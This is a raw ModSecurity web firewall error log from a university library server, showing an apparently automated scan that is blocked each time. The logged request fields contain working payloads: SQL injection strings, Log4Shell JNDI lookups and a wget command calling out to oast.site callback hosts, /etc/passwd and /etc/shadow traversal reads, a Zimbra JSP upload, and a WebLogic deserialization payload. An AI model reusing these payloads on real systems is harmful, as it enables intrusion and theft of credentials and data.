[Tue Aug 29 11:34:07.331214 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASK4eMAAAAI"]
[Tue Aug 29 11:34:08.323866 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASEJSoAAAAE"]
[Tue Aug 29 11:34:08.327672 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAAPLwFkAAAAX"]
[Tue Aug 29 11:34:08.365091 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASNzpAAAAAQ"]
[Tue Aug 29 11:34:09.339553 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASNzpMAAAAQ"]
[Tue Aug 29 11:34:10.315023 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASQqAQAAAAT"]
[Tue Aug 29 11:34:10.335951 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASS7@AAAAAY"]
[Tue Aug 29 11:34:10.370298 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgnpa9gqgw5m7e6.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASEJTAAAAAE"]
[Tue Aug 29 11:34:11.302957 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASEJTIAAAAE"]
[Tue Aug 29 11:34:11.426370 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg8wwqwbnptdu7u.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg8wwqwbnptdu7u.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlg1rcbocfkbtu7k.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASHh6sAAAAD"]
[Tue Aug 29 11:34:12.420117 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAASVoIAAAAAe"]
[Tue Aug 29 11:34:13.338166 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASLqDYAAAAM"]
[Tue Aug 29 11:34:15.317834 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgjdunxhdgtfazx.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgjdunxhdgtfazx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAASVoIcAAAAe"]
[Tue Aug 29 11:34:15.372255 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASLqD4AAAAM"]
[Tue Aug 29 11:34:16.392849 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASGMuUAAAAA"]
[Tue Aug 29 11:34:16.402244 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "perpustakaan.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASS7@8AAAAY"]
[Tue Aug 29 11:34:16.402278 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASS7@8AAAAY"]
[Tue Aug 29 11:34:16.409787 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAAPLwHYAAAAX"]
[Tue Aug 29 11:34:17.380049 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASEJUkAAAAE"]
[Tue Aug 29 11:34:19.331611 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAARdiQ0AAAAK"]
[Tue Aug 29 11:34:19.338114 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAAShCXsAAAAi"]
[Tue Aug 29 11:34:19.349134 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgp4m6bds54qmje.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASI0CcAAAAG"]
[Tue Aug 29 11:34:22.162724 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11TsCo-f0AAATOA8oAAAAH"]
[Tue Aug 29 11:34:23.636014 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASS8AUAAAAY"]
[Tue Aug 29 11:34:25.564418 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "perpustakaan.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATXLJ8AAAAb"]
[Tue Aug 29 11:34:26.249596 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAUCJcEAAAA6"]
[Tue Aug 29 11:34:26.311014 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUZcD8AAABO"]
[Tue Aug 29 11:34:26.369071 2023] [:error] [pid 1287] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgd5jrmk69gpdm7.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUHKKEAAAA-"]
[Tue Aug 29 11:34:26.588718 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "perpustakaan.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11UsCo-f0AAAUQ7qwAAABH"]
